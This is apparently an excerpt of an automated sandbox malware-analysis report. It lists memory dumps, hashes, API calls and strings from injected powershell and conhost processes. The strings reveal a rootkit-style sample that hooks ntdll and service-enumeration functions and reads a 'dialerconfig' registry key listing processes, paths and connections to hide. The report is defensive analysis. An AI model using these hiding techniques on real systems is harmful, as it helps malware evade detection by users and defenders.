                                                                                                    • Instruction ID: ee6ea3fd833f29468670801003448f71aa6721a4d5ef94d204f34afd910eda05
                                                                                                    • Opcode Fuzzy Hash: 5911ef04341d33c21c3674491cb88509033bf41b42c1d579eaab4712599f3117
                                                                                                    • Instruction Fuzzy Hash: 2C516130E00208DFDBB4CE08D565BAEB7E9AB88354F148065DA15AF295C7B1DAC0CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$84'l$tPp
                                                                                                    • API String ID: 0-2383950911
                                                                                                    • Opcode ID: 34cac86c43bb51c49e52a26328e90fa05dc1560380eedc46b36ca699da33d065
                                                                                                    • Instruction ID: 4a34ec38f8f4a479b54b71e9d0e927b212be46b89598885ecc0e79fa467ec065
                                                                                                    • Opcode Fuzzy Hash: 34cac86c43bb51c49e52a26328e90fa05dc1560380eedc46b36ca699da33d065
                                                                                                    • Instruction Fuzzy Hash: 78516C30E00209CFDBA4CE14C549BAEB7EAAF84355F1880AADB85EF250D771D980CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84'l$84'l$tPp$tPp
                                                                                                    • API String ID: 0-2623685788
                                                                                                    • Opcode ID: ba826b52dc770c9dd883b12ce87d685d0f605e35da1cde3bf0d712fa73b10e64
                                                                                                    • Instruction ID: ed9a5f4ea272dc56e4b408885bffcf6a5b02e173b52231d9e36871e26955d88d
                                                                                                    • Opcode Fuzzy Hash: ba826b52dc770c9dd883b12ce87d685d0f605e35da1cde3bf0d712fa73b10e64
                                                                                                    • Instruction Fuzzy Hash: 81312930A05244AFC7159B68D831B2ABFB2BB85310F18809BD945AF393DA71DC01C796
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $p$$p$$p$$p
                                                                                                    • API String ID: 0-3121760203
                                                                                                    • Opcode ID: 57f1290523bd5629444aeca35becd97b740deaddb84360a012fb88c78e0e1ea1
                                                                                                    • Instruction ID: be720c01eb715c07b54531ec8d712721d7e48547a53d140026f313153ec54089
                                                                                                    • Opcode Fuzzy Hash: 57f1290523bd5629444aeca35becd97b740deaddb84360a012fb88c78e0e1ea1
                                                                                                    • Instruction Fuzzy Hash: 4D2177317002445BEBB4566A9C41F2FB79EAFC0314F24842AEA09CF385DE79D8C1C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$$p$$p
                                                                                                    • API String ID: 0-377911355
                                                                                                    • Opcode ID: 1f003a9d9b6a804e9d080a99bb219e52e80016949f4e71286841c8bb99f92515
                                                                                                    • Instruction ID: 51f5c6e93fd6bc25af05812c824b9468fb793897fa9fdd17c3719237e82d6693
                                                                                                    • Opcode Fuzzy Hash: 1f003a9d9b6a804e9d080a99bb219e52e80016949f4e71286841c8bb99f92515
                                                                                                    • Instruction Fuzzy Hash: 4F01D110B0D3C54FCB2B122868212696F764FC264072A41DBC292EF7A6DD998C0687A6

                                                                                                    Execution Graph

                                                                                                    Execution Coverage: 0.7%
                                                                                                    Dynamic/Decrypted Code Coverage: 0%
                                                                                                    Signature Coverage: 0%
                                                                                                    Total number of Nodes: 68
                                                                                                    Total number of Limit Nodes: 2

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1683269324-0
                                                                                                    • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction ID: e23723634f239079efe5ef482868ad70eb78eaabc87ebcabcae97c3002fbcd4f
                                                                                                    • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction Fuzzy Hash: 68118B30610E01D2F7219721ADDE7D92290BB44B47FC501B49BCAC5196FF38C488CE18

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 000002505E591650: GetProcessHeap.KERNEL32 ref: 000002505E59165B
                                                                                                      • Part of subcall function 000002505E591650: HeapAlloc.KERNEL32 ref: 000002505E59166A
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5916DA
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591707
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591721
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591741
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E59175C
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E59177C
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591797
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5917B7
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5917D2
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5917F2
                                                                                                    • Sleep.KERNEL32 ref: 000002505E591C43
                                                                                                    • SleepEx.KERNELBASE ref: 000002505E591C49
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E59180D
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E59182D
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591848
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591868
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591883
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5918A3
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5918BE
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5918C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1534210851-0
                                                                                                    • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction ID: f1320772364239a434be47288a97cf92ae0eee32445d144f9747ad0b12113194
                                                                                                    • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction Fuzzy Hash: 0031A725201F21D1FA54AB36DFD939A13A4BB44BC2F8650A19EC9C7697FF34C850CA98

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction ID: e652ce79e243bc08c4e1e017510b3e890d96c0b0de5381955907360cf7cd1011
                                                                                                    • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction Fuzzy Hash: 0E614336701A5183EFA8CF15DCC876DB395FB04B95FC49121DA9907795EB38E892CB08

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                    • API String ID: 2119608203-3850299575
                                                                                                    • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction ID: 5e0709815862efe802ed7359c45e75eeb4cdf8ea8e86c4e55cc9c47c24919687
                                                                                                    • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction Fuzzy Hash: EBB1B026210E50C1EB648F25DDC87E963A4F744B86FD460A6EE8993796FF35CD80CB44

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction ID: c23d714b202c221fde1521f3e350eca2c0467bcd1810bf85d4bc7971334757a2
                                                                                                    • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction Fuzzy Hash: 76313C72204F8485EB608F60ECC43DD7361F784749F84456ADB8D87A99EF38C548CB18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction ID: 9354a2845cc7714b2a9ee4e1c570088617990842ec264ae1819e189ccdbe8e18
                                                                                                    • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction Fuzzy Hash: DA313E32214F8086EB608F25ECC43DE73A5F789799F900266EA9D47B55EF38C545CB04
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 1443284424-0
                                                                                                    • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction ID: 636c1e3b06029df0088c86e0660af75f9ed8612f54661368389bcf71a4af3630
                                                                                                    • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction Fuzzy Hash: E3E1E372714A809AE700CF64DCC83DD7BB1F34578AF944666EF8A57B99EA34C416CB04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                    • API String ID: 106492572-2879589442
                                                                                                    • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction ID: 3139cf8046bb514e4688623e57be07620b99a5020dd30aeb56695fd9a58f31cf
                                                                                                    • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction Fuzzy Hash: CA710A26710F51C6EB109F66ECC879D27A4F785B8EF8112A1DA8D87A69FF38C445CB04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                    • String ID: d
                                                                                                    • API String ID: 2005889112-2564639436
                                                                                                    • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction ID: e844e875d29133f9c86232fa7698c22099c62d17490d6f35accde34e686044f2
                                                                                                    • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction Fuzzy Hash: 72514872214F54D2EB14CB62EDC839EB7A1F788B86F858264DB8947B14EF38C456CB04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                    • API String ID: 4175298099-1975688563
                                                                                                    • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction ID: 3c1babcf03876547483fef2bf1b765349b20cac9363862c95e3f210a446c0181
                                                                                                    • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction Fuzzy Hash: F931E568601D4AE0FA04EF64FCE97D82325B744347FC466B3D68942163BE38829DCB9C

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2171963597-1373409510
                                                                                                    • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction ID: 7ef3f1b231ac4ff2d91a1f13292fcef93ae9c85732082524e076d11961578214
                                                                                                    • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction Fuzzy Hash: D9210E35614A4082E7108B25FDC835E67A0F789BAAF904365DB9942EA9EF3CC149CF04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                    • String ID: d
                                                                                                    • API String ID: 3743429067-2564639436
                                                                                                    • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction ID: 3e23dcc5ee773e3cae08eb5d892718dbf01268825bcdb9572bcbd32f75e6c53d
                                                                                                    • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction Fuzzy Hash: 44418033214B90D7E7608F51E98839EB7A1F388B89F408225DBC947B58EF38C564CB04

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 318 2505e5669f0-2505e5669f6 319 2505e566a31-2505e566a3b 318->319 320 2505e5669f8-2505e5669fb 318->320 321 2505e566b58-2505e566b6d 319->321 322 2505e566a25-2505e566a64 call 2505e5670a0 320->322 323 2505e5669fd-2505e566a00 320->323 327 2505e566b6f 321->327 328 2505e566b7c-2505e566b96 call 2505e566f34 321->328 341 2505e566b32 322->341 342 2505e566a6a-2505e566a7f call 2505e566f34 322->342 325 2505e566a02-2505e566a05 323->325 326 2505e566a18 __scrt_dllmain_crt_thread_attach 323->326 332 2505e566a07-2505e566a10 325->332 333 2505e566a11-2505e566a16 call 2505e566fe4 325->333 330 2505e566a1d-2505e566a24 326->330 334 2505e566b71-2505e566b7b 327->334 339 2505e566bcf-2505e566c00 call 2505e567270 328->339 340 2505e566b98-2505e566bcd call 2505e56705c call 2505e566efc call 2505e5673f8 call 2505e567210 call 2505e567234 call 2505e56708c 328->340 333->330 350 2505e566c02-2505e566c08 339->350 351 2505e566c11-2505e566c17 339->351 340->334 345 2505e566b34-2505e566b49 341->345 353 2505e566a85-2505e566a96 call 2505e566fa4 342->353 354 2505e566b4a-2505e566b57 call 2505e567270 342->354 350->351 355 2505e566c0a-2505e566c0c 350->355 356 2505e566c5e-2505e566c74 call 2505e562858 351->356 357 2505e566c19-2505e566c23 351->357 371 2505e566ae7-2505e566af1 call 2505e567210 353->371 372 2505e566a98-2505e566abc call 2505e5673bc call 2505e566eec call 2505e566f18 call 2505e5690dc 353->372 354->321 361 2505e566cff-2505e566d0c 355->361 374 2505e566c76-2505e566c78 356->374 375 2505e566cac-2505e566cae 356->375 362 2505e566c25-2505e566c2d 357->362 363 2505e566c2f-2505e566c3d call 2505e572758 357->363 368 2505e566c43-2505e566c58 call 2505e5669f0 362->368 363->368 385 2505e566cf5-2505e566cfd 363->385 368->356 368->385 371->341 394 2505e566af3-2505e566aff call 2505e567260 371->394 372->371 421 2505e566abe-2505e566ac5 __scrt_dllmain_after_initialize_c 372->421 374->375 382 2505e566c7a-2505e566c9c call 2505e562858 call 2505e566b58 374->382 383 2505e566cb5-2505e566cca call 2505e5669f0 375->383 384 2505e566cb0-2505e566cb3 375->384 382->375 415 2505e566c9e-2505e566ca6 call 2505e572758 382->415 383->385 403 2505e566ccc-2505e566cd6 383->403 384->383 384->385 385->361 405 2505e566b25-2505e566b30 394->405 406 2505e566b01-2505e566b0b call 2505e567178 394->406 409 2505e566ce1-2505e566cf1 call 2505e572758 403->409 410 2505e566cd8-2505e566cdf 403->410 405->345 406->405 420 2505e566b0d-2505e566b1b 406->420 409->385 410->385 415->375 420->405 421->371 422 2505e566ac7-2505e566ae4 call 2505e569078 421->422 422->371
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 0f1fb978be7e679422a702753c49b8a575c286eaa1f4356e3236a4e573dc26b9
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: 8F81E271710E4186FB60AB269CCD39963D0FB857C2FC480A5AEC543796FBB9C8598F08

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 425 2505e5975f0-2505e5975f6 426 2505e5975f8-2505e5975fb 425->426 427 2505e597631-2505e59763b 425->427 429 2505e5975fd-2505e597600 426->429 430 2505e597625-2505e597664 call 2505e597ca0 426->430 428 2505e597758-2505e59776d 427->428 434 2505e59777c-2505e597796 call 2505e597b34 428->434 435 2505e59776f 428->435 432 2505e597618 __scrt_dllmain_crt_thread_attach 429->432 433 2505e597602-2505e597605 429->433 445 2505e59766a-2505e59767f call 2505e597b34 430->445 446 2505e597732 430->446 441 2505e59761d-2505e597624 432->441 437 2505e597611-2505e597616 call 2505e597be4 433->437 438 2505e597607-2505e597610 433->438 448 2505e597798-2505e5977cd call 2505e597c5c call 2505e597afc call 2505e597ff8 call 2505e597e10 call 2505e597e34 call 2505e597c8c 434->448 449 2505e5977cf-2505e597800 call 2505e597e70 434->449 439 2505e597771-2505e59777b 435->439 437->441 458 2505e59774a-2505e597757 call 2505e597e70 445->458 459 2505e597685-2505e597696 call 2505e597ba4 445->459 451 2505e597734-2505e597749 446->451 448->439 460 2505e597811-2505e597817 449->460 461 2505e597802-2505e597808 449->461 458->428 478 2505e597698-2505e5976bc call 2505e597fbc call 2505e597aec call 2505e597b18 call 2505e599cdc 459->478 479 2505e5976e7-2505e5976f1 call 2505e597e10 459->479 463 2505e597819-2505e597823 460->463 464 2505e59785e-2505e597874 call 2505e593458 460->464 461->460 462 2505e59780a-2505e59780c 461->462 468 2505e5978ff-2505e59790c 462->468 469 2505e59782f-2505e59783d call 2505e5a3358 463->469 470 2505e597825-2505e59782d 463->470 486 2505e5978ac-2505e5978ae 464->486 487 2505e597876-2505e597878 464->487 475 2505e597843-2505e597858 call 2505e5975f0 469->475 490 2505e5978f5-2505e5978fd 469->490 470->475 475->464 475->490 478->479 528 2505e5976be-2505e5976c5 __scrt_dllmain_after_initialize_c 478->528 479->446 499 2505e5976f3-2505e5976ff call 2505e597e60 479->499 488 2505e5978b0-2505e5978b3 486->488 489 2505e5978b5-2505e5978ca call 2505e5975f0 486->489 487->486 495 2505e59787a-2505e59789c call 2505e593458 call 2505e597758 487->495 488->489 488->490 489->490 509 2505e5978cc-2505e5978d6 489->509 490->468 495->486 520 2505e59789e-2505e5978a6 call 2505e5a3358 495->520 517 2505e597701-2505e59770b call 2505e597d78 499->517 518 2505e597725-2505e597730 499->518 514 2505e5978d8-2505e5978df 509->514 515 2505e5978e1-2505e5978f1 call 2505e5a3358 509->515 514->490 515->490 517->518 527 2505e59770d-2505e59771b 517->527 518->451 520->486 527->518 528->479 529 2505e5976c7-2505e5976e4 call 2505e599c78 528->529 529->479
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 77931e95ccbcf059cda7bcbb1bf8d6d8393bb13f5076452cb19ead3b77a936ce
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: B781A022704E49C6FA50AB759CCD3D96291BB45B87FC841E69AC4C7797FA38C841CF08

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 532 2505e599804-2505e599842 533 2505e599848-2505e59984b 532->533 534 2505e599933 532->534 535 2505e599935-2505e599951 533->535 536 2505e599851 533->536 534->535 537 2505e599854 536->537 538 2505e59992b 537->538 539 2505e59985a-2505e599869 537->539 538->534 540 2505e59986b-2505e59986e 539->540 541 2505e599876-2505e599895 LoadLibraryExW 539->541 542 2505e59990d-2505e59991c call 2505e5a3090 540->542 543 2505e599874 540->543 544 2505e5998ed-2505e599902 541->544 545 2505e599897-2505e5998a0 call 2505e5a3080 541->545 542->538 552 2505e59991e-2505e599929 542->552 546 2505e5998e1-2505e5998e8 543->546 544->542 548 2505e599904-2505e599907 FreeLibrary 544->548 553 2505e5998cf-2505e5998d9 545->553 554 2505e5998a2-2505e5998b7 call 2505e59ad28 545->554 546->537 548->542 552->535 553->546 554->553 557 2505e5998b9-2505e5998cd LoadLibraryExW 554->557 557->544 557->553
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction ID: 76bddfb9a447f01753fc307bb21d1204c014d295f60e6576bde33efb9e77d66b
                                                                                                    • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction Fuzzy Hash: E631A731212F50D1EE119B02ACC87D963A4F708BA6F990569EDAD87741FF38C445CB04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction ID: 5a87951288a97162f8a12c67fbdb641b5f6a86850d3693ab35dc9a85953687c8
